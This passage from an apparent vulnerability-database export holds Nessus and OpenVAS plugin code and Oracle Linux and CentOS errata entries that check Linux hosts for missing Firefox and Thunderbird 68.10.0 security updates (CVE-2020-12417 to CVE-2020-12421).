script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'firefox-68.10.0-1.el7.centos',\n 'firefox-debuginfo-68.10.0-1.el7.centos'\n ],\n 'CGSL MAIN 5.04': [\n 'firefox-68.10.0-1.el7.centos',\n 'firefox-debuginfo-68.10.0-1.el7.centos'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-29T05:35:56", "description": "The remote Redhat Enterprise Linux 7 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2827 advisory.\n\n - Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 7, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-07T00:00:00", "title": "RHEL 7 : firefox (RHSA-2020:2827)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-07T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7::server", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:firefox", "cpe:/o:redhat:enterprise_linux:7::workstation", "cpe:/o:redhat:enterprise_linux:7::client"], "id": "REDHAT-RHSA-2020-2827.NASL", "href": "https://www.tenable.com/plugins/nessus/138144", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2827. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138144);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\n \"CVE-2020-12417\",\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2827\");\n\n script_name(english:\"RHEL 7 : firefox (RHSA-2020:2827)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2827 advisory.\n\n - Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/119.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/296.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12417\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12419\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12420\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12421\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2827\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(119, 200, 296, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_7_client': [\n 'rhel-7-desktop-debug-rpms',\n 'rhel-7-desktop-fastrack-debug-rpms',\n 'rhel-7-desktop-fastrack-rpms',\n 'rhel-7-desktop-fastrack-source-rpms',\n 'rhel-7-desktop-optional-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-rpms',\n 'rhel-7-desktop-optional-fastrack-source-rpms',\n 'rhel-7-desktop-optional-rpms',\n 'rhel-7-desktop-optional-source-rpms',\n 'rhel-7-desktop-rpms',\n 'rhel-7-desktop-source-rpms'\n ],\n 'enterprise_linux_7_server': [\n 'rhel-7-for-system-z-a-debug-rpms',\n 'rhel-7-for-system-z-a-optional-debug-rpms',\n 'rhel-7-for-system-z-a-optional-rpms',\n 'rhel-7-for-system-z-a-optional-source-rpms',\n 'rhel-7-for-system-z-a-rpms',\n 'rhel-7-for-system-z-a-source-rpms',\n 'rhel-7-for-system-z-debug-rpms',\n 'rhel-7-for-system-z-fastrack-debug-rpms',\n 'rhel-7-for-system-z-fastrack-rpms',\n 'rhel-7-for-system-z-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-rpms',\n 'rhel-7-for-system-z-optional-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-rpms',\n 'rhel-7-for-system-z-optional-source-rpms',\n 'rhel-7-for-system-z-rpms',\n 'rhel-7-for-system-z-source-rpms',\n 'rhel-7-server-debug-rpms',\n 'rhel-7-server-fastrack-debug-rpms',\n 'rhel-7-server-fastrack-rpms',\n 'rhel-7-server-fastrack-source-rpms',\n 'rhel-7-server-optional-debug-rpms',\n 'rhel-7-server-optional-fastrack-debug-rpms',\n 'rhel-7-server-optional-fastrack-rpms',\n 'rhel-7-server-optional-fastrack-source-rpms',\n 'rhel-7-server-optional-rpms',\n 'rhel-7-server-optional-source-rpms',\n 'rhel-7-server-rpms',\n 'rhel-7-server-source-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-source-rpms',\n 'rhel-ha-for-rhel-7-server-debug-rpms',\n 'rhel-ha-for-rhel-7-server-rpms',\n 'rhel-ha-for-rhel-7-server-source-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-source-rpms',\n 'rhel-rs-for-rhel-7-server-debug-rpms',\n 'rhel-rs-for-rhel-7-server-rpms',\n 'rhel-rs-for-rhel-7-server-source-rpms'\n ],\n 'enterprise_linux_7_workstation': [\n 'rhel-7-workstation-debug-rpms',\n 'rhel-7-workstation-fastrack-debug-rpms',\n 'rhel-7-workstation-fastrack-rpms',\n 'rhel-7-workstation-fastrack-source-rpms',\n 'rhel-7-workstation-optional-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-rpms',\n 'rhel-7-workstation-optional-fastrack-source-rpms',\n 'rhel-7-workstation-optional-rpms',\n 'rhel-7-workstation-optional-source-rpms',\n 'rhel-7-workstation-rpms',\n 'rhel-7-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:2827');\n}\n\npkgs = [\n {'reference':'firefox-68.10.0-1.el7_8', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'firefox-68.10.0-1.el7_8', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'firefox-68.10.0-1.el7_8', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-07-15T12:10:09", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1]\n- fix LD_LIBRARY_PATH\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat one\n[68.10.0-1]\n- Update to 68.10.0 build1", "edition": 3, "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "ELSA-2020-2824", "href": "http://linux.oracle.com/errata/ELSA-2020-2824.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-17T11:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[68.10.0-1]\n- Update to 68.10.0 build1", "edition": 1, "modified": "2020-07-17T00:00:00", "published": "2020-07-17T00:00:00", "id": "ELSA-2020-2966", "href": "http://linux.oracle.com/errata/ELSA-2020-2966.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T17:11:54", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1.el8_2]\n- Rebuild to pickup Oracle default bookmarks [Orabug: 30069264]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n- Remove upstream references [Orabug: 30530527]\n[68.10.0-1]\n- Update to 68.10.0 build1", "edition": 3, "modified": "2020-07-08T00:00:00", "published": "2020-07-08T00:00:00", "id": "ELSA-2020-2828", "href": "http://linux.oracle.com/errata/ELSA-2020-2828.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T12:11:59", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1]\n- Remove upstream references [Orabug: 30143292]\n- Update distribution for Oracle Linux [Orabug: 30143292]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n* Fri Jun 26 2020 Jan Horak \n- Update to 68.10.0 build1", "edition": 3, "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "ELSA-2020-2827", "href": "http://linux.oracle.com/errata/ELSA-2020-2827.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T12:12:52", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[68.10.0-1]\n- Update to 68.10.0 build1", "edition": 3, "modified": "2020-07-14T00:00:00", "published": "2020-07-14T00:00:00", "id": "ELSA-2020-2906", "href": "http://linux.oracle.com/errata/ELSA-2020-2906.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-23T07:36:37", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "[68.10.0-1.0.1.el8_2]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[68.10.0-1]\n- Update to 68.10.0 build1", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2020-07-22T00:00:00", "id": "ELSA-2020-3038", "href": "http://linux.oracle.com/errata/ELSA-2020-3038.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-07-15T11:31:33", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "**CentOS Errata and Security Advisory** CESA-2020:2824\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2020-July/035776.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 2, "modified": "2020-07-08T17:26:10", "published": "2020-07-08T17:26:10", "id": "CESA-2020:2824", "href": "http://lists.centos.org/pipermail/centos-announce/2020-July/035776.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T11:27:35", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "**CentOS Errata and Security Advisory** CESA-2020:2827\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory corruption due to missing sign-extension for ValueTags on ARM64 (CVE-2020-12417)\n\n* Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n* Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n* Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n* Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2020-July/035774.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 2, "modified": "2020-07-08T17:23:13", "published": "2020-07-08T17:23:13", "id": "CESA-2020:2827", "href": "http://lists.centos.org/pipermail/centos-announce/2020-July/035774.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T20:05:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-16T00:00:00", "published": "2020-07-09T00:00:00", "id": "OPENVAS:1361412562310883259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883259", "type": "openvas", "title": "CentOS: Security Advisory for firefox (CESA-2020:2824)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883259\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_cve_id(\"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-09 03:00:45 +0000 (Thu, 09 Jul 2020)\");\n script_name(\"CentOS: Security Advisory for firefox (CESA-2020:2824)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n\n script_xref(name:\"CESA\", value:\"2020:2824\");\n script_xref(name:\"URL\", value:\"https://lists.centos.org/pipermail/centos-announce/2020-July/035776.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the CESA-2020:2824 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.10.0 ESR.\n\nSecurity Fix(es):\n\n * Mozilla: Information disclosure due to manipulated URL object\n(CVE-2020-12418)\n\n * Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n * Mozilla: Use-After-Free when trying to connect to a STUN server\n(CVE-2020-12420)\n\n * Mozilla: Add-On updates did not respect the same certificate trust rules\nas software updates (CVE-2020-12421)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on CentOS 6.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS6\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~68.10.0~1.el6.centos\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:07:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-16T00:00:00", "published": "2020-07-07T00:00:00", "id": "OPENVAS:1361412562310704718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704718", "type": "openvas", "title": "Debian: Security Advisory for thunderbird (DSA-4718-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n 